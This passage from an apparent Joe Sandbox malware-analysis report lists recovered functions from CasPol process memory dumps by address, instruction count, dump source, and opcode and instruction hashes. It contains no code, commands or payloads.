                                                                                                                                    • Opcode Fuzzy Hash: 6d3f949f0baaeea6f7591b386e7cf5e917b368b2667493e4aac8d60d132f930d
                                                                                                                                    • Instruction Fuzzy Hash: B6E13974A15219DFDBA2DF28CC48AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53291 Relevance: .3, Instructions: 277COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dcb3438ac34ba351b59b2a8272cae6409b07c699e9482c2a2836feaec728fc3f
                                                                                                                                    • Instruction ID: dbcda62961b48f1a74603eea4529c3411bcc5ad0d7c98cfc1d07fab576072e66
                                                                                                                                    • Opcode Fuzzy Hash: dcb3438ac34ba351b59b2a8272cae6409b07c699e9482c2a2836feaec728fc3f
                                                                                                                                    • Instruction Fuzzy Hash: 8EE14974A15219DFDBA2DF28CC48AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC532E5 Relevance: .3, Instructions: 265COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 13d6b0f6780fa2f19d419dea2507198993b3022ba2a69c952c3584000c3e218d
                                                                                                                                    • Instruction ID: ce06d48144af6499a9106767387db1b9ec2b967e84041e5c3b3520d3b71b60c3
                                                                                                                                    • Opcode Fuzzy Hash: 13d6b0f6780fa2f19d419dea2507198993b3022ba2a69c952c3584000c3e218d
                                                                                                                                    • Instruction Fuzzy Hash: 7FD14A74A15219DFDBA2DF28CC48AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53330 Relevance: .3, Instructions: 257COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 50ae026650512e39fe288e0af6d2df515f7f5479e54c14fbb59cb263cb1d786c
                                                                                                                                    • Instruction ID: 74d3d897d1333e05093fc4f07d402167600ce22636fde3a97bb4beeb721073a2
                                                                                                                                    • Opcode Fuzzy Hash: 50ae026650512e39fe288e0af6d2df515f7f5479e54c14fbb59cb263cb1d786c
                                                                                                                                    • Instruction Fuzzy Hash: 3FD14974A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC589F1 Relevance: .3, Instructions: 254COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d6c566b81c3271622582d3a98e82421d2ea12aac3e5a41ea4ea827f5426a2b4c
                                                                                                                                    • Instruction ID: f538dc9d037fd03b80cea914fd1f907cbba77f8c2b77c20d3c923ff25507b288
                                                                                                                                    • Opcode Fuzzy Hash: d6c566b81c3271622582d3a98e82421d2ea12aac3e5a41ea4ea827f5426a2b4c
                                                                                                                                    • Instruction Fuzzy Hash: 55A1AD74B05346CFDB45DB78C44469EBBF1EF89310F1582AAC409DB3A2DB34A846CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065A8D0 Relevance: .3, Instructions: 253COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 372f3a5a0dd5aaa413be90f52c48c30914a9d353ad558cb367a0ef9943641907
                                                                                                                                    • Instruction ID: 21098adbbdd6dc11ad1e75f05d03c397c82b0177cbc62956f61849419c924475
                                                                                                                                    • Opcode Fuzzy Hash: 372f3a5a0dd5aaa413be90f52c48c30914a9d353ad558cb367a0ef9943641907
                                                                                                                                    • Instruction Fuzzy Hash: FF911C71F002148BDB44DBB8C5A47AE7BF3AFC8350F258428D506EB384EE359D068B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC57DB8 Relevance: .3, Instructions: 251COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fe6d6f77e95070ea1afe9d83d6f233514870894ebfab354a1a1f3e0cf150495a
                                                                                                                                    • Instruction ID: d09c0b88f4ba262fd278d476e19291470fed8bfe27bbf9e5a4151e1b4b176ea0
                                                                                                                                    • Opcode Fuzzy Hash: fe6d6f77e95070ea1afe9d83d6f233514870894ebfab354a1a1f3e0cf150495a
                                                                                                                                    • Instruction Fuzzy Hash: 9E916F71F003558FCB10DBB8C980A9EBBB2AF84314F15C519E815DB3A5EB30E845DB59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC585DC Relevance: .2, Instructions: 250COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ba341edebd042b664e429ac95550b5af5f9ca72260bfff7fcdb0cc8575220236
                                                                                                                                    • Instruction ID: 12abd3c14ff1f5f6f36996dc23bb2df053a5617a6b9157971e6354478f727962
                                                                                                                                    • Opcode Fuzzy Hash: ba341edebd042b664e429ac95550b5af5f9ca72260bfff7fcdb0cc8575220236
                                                                                                                                    • Instruction Fuzzy Hash: 3AA14D70E006099FDB04DFA8C990A9EBBF2FF88300F148569D416EB3A5DB34A846CB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53384 Relevance: .2, Instructions: 245COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 60b5a0646275c49e0cc3630a64c847590b2ad46b3257e9d40efda753ee64c5f4
                                                                                                                                    • Instruction ID: 3dfd0d6766911657028ac6899d6994f028addc61b7ae1bb7e40f24742539249b
                                                                                                                                    • Opcode Fuzzy Hash: 60b5a0646275c49e0cc3630a64c847590b2ad46b3257e9d40efda753ee64c5f4
                                                                                                                                    • Instruction Fuzzy Hash: D1D14974A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC57D9C Relevance: .2, Instructions: 241COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eb5dd320b747b44bdea839d767b68dcfa39ad78ceed1f62c6bd287b44b84d762
                                                                                                                                    • Instruction ID: 3177dc1fe3356fe544845064fcc5406b474a02203906626cf5317c481af04e9d
                                                                                                                                    • Opcode Fuzzy Hash: eb5dd320b747b44bdea839d767b68dcfa39ad78ceed1f62c6bd287b44b84d762
                                                                                                                                    • Instruction Fuzzy Hash: AA915C71B002458FCB11DFB8C980A9EBBB2AF85310F15C519E815DB3E6EB30E845DB59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC533CF Relevance: .2, Instructions: 237COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a8d3856206388ecedf2dce2d407a08ccbdfe17afefd98758b7a89523b85d0fe
                                                                                                                                    • Instruction ID: 4233c2c57c746d2d24fc15be48e5445d0caeb64a0eb2217c3b71a269dd086001
                                                                                                                                    • Opcode Fuzzy Hash: 9a8d3856206388ecedf2dce2d407a08ccbdfe17afefd98758b7a89523b85d0fe
                                                                                                                                    • Instruction Fuzzy Hash: ABC14A74A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065F474 Relevance: .2, Instructions: 230COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b130006a305c02967effa2321623b461a275c1dd1d59a412cc77a9bf69b0bc3e
                                                                                                                                    • Instruction ID: 54d0f02b301887ee6ae82297eb8c7cf357bacc5b4703cee780a7b305eeb1a0a5
                                                                                                                                    • Opcode Fuzzy Hash: b130006a305c02967effa2321623b461a275c1dd1d59a412cc77a9bf69b0bc3e
                                                                                                                                    • Instruction Fuzzy Hash: 6081757570E3858FD70397B8886465A3FF19F47204F1980E7D044DF2A3EA689C09CB66
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC585F8 Relevance: .2, Instructions: 229COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c176e5cd9d25ca1bf64b8e09ec471d5eb7e155c7c918edddfa0dc3eb2b3c6ee9
                                                                                                                                    • Instruction ID: 5ed703a4d6021bd5e13a845e4cfc62628bf5b22d2e16de6b4ba6853b73b7a729
                                                                                                                                    • Opcode Fuzzy Hash: c176e5cd9d25ca1bf64b8e09ec471d5eb7e155c7c918edddfa0dc3eb2b3c6ee9
                                                                                                                                    • Instruction Fuzzy Hash: A1912B70E006199FDB04DFA8C980A9EBBF6FF88300F14C529D416AB3A5DB30AC46CB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53426 Relevance: .2, Instructions: 225COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 84bd65ac858c30665bd888972b07143f8d0fd6a637fe1be8bc549ff069a52790
                                                                                                                                    • Instruction ID: 340ec1f6bb28ebc5f378fdf26ac81812f87c61c0872139d1c2e21e28c02b097c
                                                                                                                                    • Opcode Fuzzy Hash: 84bd65ac858c30665bd888972b07143f8d0fd6a637fe1be8bc549ff069a52790
                                                                                                                                    • Instruction Fuzzy Hash: B5C14A74A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065B768 Relevance: .2, Instructions: 225COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee0e91334077ddc85ecd2ba1bc80aee23b336c712165895ccbda19bd41a01e6f
                                                                                                                                    • Instruction ID: 528ea55a188d8e15782c05012ca87deca1aebd986a51b541f610922047b49cbc
                                                                                                                                    • Opcode Fuzzy Hash: ee0e91334077ddc85ecd2ba1bc80aee23b336c712165895ccbda19bd41a01e6f
                                                                                                                                    • Instruction Fuzzy Hash: 1481C070B002158FEB15DBB8C894BAEBBF3AFC4304F298469D1069B391DE75AC45C752
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51288 Relevance: .2, Instructions: 224COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3cf5b09e469ade8567eb2f90c705cbcdbc7ebe16064a7893dcae4b297d9c16ef
                                                                                                                                    • Instruction ID: 5ca7a5934ef6ae6f93de2e507b8ab6543ede95f911fc328693a99183f36be2da
                                                                                                                                    • Opcode Fuzzy Hash: 3cf5b09e469ade8567eb2f90c705cbcdbc7ebe16064a7893dcae4b297d9c16ef
                                                                                                                                    • Instruction Fuzzy Hash: 5B71D034B042158FD706ABBC88542AE7FA2ABC9310F65456AC406CB3A3DF359D07CB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53471 Relevance: .2, Instructions: 217COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8d63a904f124505b866656adb531308c5ec1c351578ee03ddf1cdda5de9d100
                                                                                                                                    • Instruction ID: aef042e5f1b562f62100b8ead90c0dae90d370e2d4a046275a246866f11b1314
                                                                                                                                    • Opcode Fuzzy Hash: a8d63a904f124505b866656adb531308c5ec1c351578ee03ddf1cdda5de9d100
                                                                                                                                    • Instruction Fuzzy Hash: D8B15A74A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065A814 Relevance: .2, Instructions: 214COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2de9261e9dad987390e104d826b576f173fb18e07e75740a760da6a3f66171ae
                                                                                                                                    • Instruction ID: 8ffcbe28423b380aa4ceea46f904dca7ffd584ffd5f04211ad9f5952dd65bffc
                                                                                                                                    • Opcode Fuzzy Hash: 2de9261e9dad987390e104d826b576f173fb18e07e75740a760da6a3f66171ae
                                                                                                                                    • Instruction Fuzzy Hash: 0971A370B043458FDB029BB8C85469E7FF2AF8A300F1584A9D545DF392DA35DC0ACBA6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC534C8 Relevance: .2, Instructions: 207COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9bcbf0e708747f3e68f52b02b73d5219893d2e6d932c989ecc4d603d3bba8522
                                                                                                                                    • Instruction ID: 4a395cd055e4a3c2e7981309c611c2b948e851f6ebce352fced6b288f27ff8c2
                                                                                                                                    • Opcode Fuzzy Hash: 9bcbf0e708747f3e68f52b02b73d5219893d2e6d932c989ecc4d603d3bba8522
                                                                                                                                    • Instruction Fuzzy Hash: FCB15A74A15219DFDBA2DF68C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59F44 Relevance: .2, Instructions: 197COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 88460c49e1c2a898af29cc31eda69be0f9551addafd9598c25b997fc1aa398a2
                                                                                                                                    • Instruction ID: 17f9a19d87f77acdaaec8a229982bf25a36374fb36b484851a83cfadc25b0775
                                                                                                                                    • Opcode Fuzzy Hash: 88460c49e1c2a898af29cc31eda69be0f9551addafd9598c25b997fc1aa398a2
                                                                                                                                    • Instruction Fuzzy Hash: EF612732F043429FE7058B2EC85479AFBE6AFC5304F15C06AD50ADB2A1DBB29C09D795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5351F Relevance: .2, Instructions: 197COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 10f62289b4a7cfb3c01f06191230389ee96ee0ccb7f64cea1756a038cb6fd158
                                                                                                                                    • Instruction ID: b17dbf0c90d0fa6acd40a2f37cf9637b40a53766b83e4ca66211e2abaeb3f18c
                                                                                                                                    • Opcode Fuzzy Hash: 10f62289b4a7cfb3c01f06191230389ee96ee0ccb7f64cea1756a038cb6fd158
                                                                                                                                    • Instruction Fuzzy Hash: 5CA14A74A15219DFDBA2DF68C8486A8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC51CE8 Relevance: .2, Instructions: 193COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f214b19d120146b39cdf44a66a7165bc904d976abd9d5a65c390671a64052a8b
                                                                                                                                    • Instruction ID: 63ffc194544885bd4e737778e007e551131e4dfa9e125bc403cddb21784fef33
                                                                                                                                    • Opcode Fuzzy Hash: f214b19d120146b39cdf44a66a7165bc904d976abd9d5a65c390671a64052a8b
                                                                                                                                    • Instruction Fuzzy Hash: 29611775B00324DFDF04ABB8C89879E7BF6AF8C341B144529E506DB3A4DE35A846CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53576 Relevance: .2, Instructions: 185COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4b2b1c3c7c5bc2dedf90cb10b5a1f44f8fff4f79cbe088ec1c2ab4db51091637
                                                                                                                                    • Instruction ID: f23ebf0a5b94eced77c0f1455e9d9cd7a32805395e08ecb3ce9a727a168291fb
                                                                                                                                    • Opcode Fuzzy Hash: 4b2b1c3c7c5bc2dedf90cb10b5a1f44f8fff4f79cbe088ec1c2ab4db51091637
                                                                                                                                    • Instruction Fuzzy Hash: 91A15A74A15219DFDBA2DF68C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065F670 Relevance: .2, Instructions: 185COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aaf531aa96458c2707ecab0e8781e0ff7275b700d31e221a31d66758cf852fb8
                                                                                                                                    • Instruction ID: 1ae551ec505de3b6d6aa56e2d8cec9f33c8cfc4ba43ad67eea10dd5c9e4bcfba
                                                                                                                                    • Opcode Fuzzy Hash: aaf531aa96458c2707ecab0e8781e0ff7275b700d31e221a31d66758cf852fb8
                                                                                                                                    • Instruction Fuzzy Hash: 95514D71F002148FDB44EBB8C49879EBBF6EF88250B248525D906E7380EF34DD068BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC535C1 Relevance: .2, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 286236b7588fe1927f0fe4fe9a67cadf0bd9e6d0b489df5339810dd00f6fd764
                                                                                                                                    • Instruction ID: 7612d9270a2d372554e39196f82735a1277c1bc1988c654f091f84a6eb32f5e4
                                                                                                                                    • Opcode Fuzzy Hash: 286236b7588fe1927f0fe4fe9a67cadf0bd9e6d0b489df5339810dd00f6fd764
                                                                                                                                    • Instruction Fuzzy Hash: 4A915974A15219DFDBA2DF68C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653EDC Relevance: .2, Instructions: 172COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 15eacf7a7eb74a1bfc27653cf6aa61d10d628dde9893931a28f747de3ae471eb
                                                                                                                                    • Instruction ID: ab06cfd1702b1e49bb8007de07814da6352a312440f5cadc51de7baa677b90c1
                                                                                                                                    • Opcode Fuzzy Hash: 15eacf7a7eb74a1bfc27653cf6aa61d10d628dde9893931a28f747de3ae471eb
                                                                                                                                    • Instruction Fuzzy Hash: 9751A471E053089FDB15CFB8C890ADEBFB2AF89304F15846AD505BB691DB30AD09CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC599F1 Relevance: .2, Instructions: 171COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
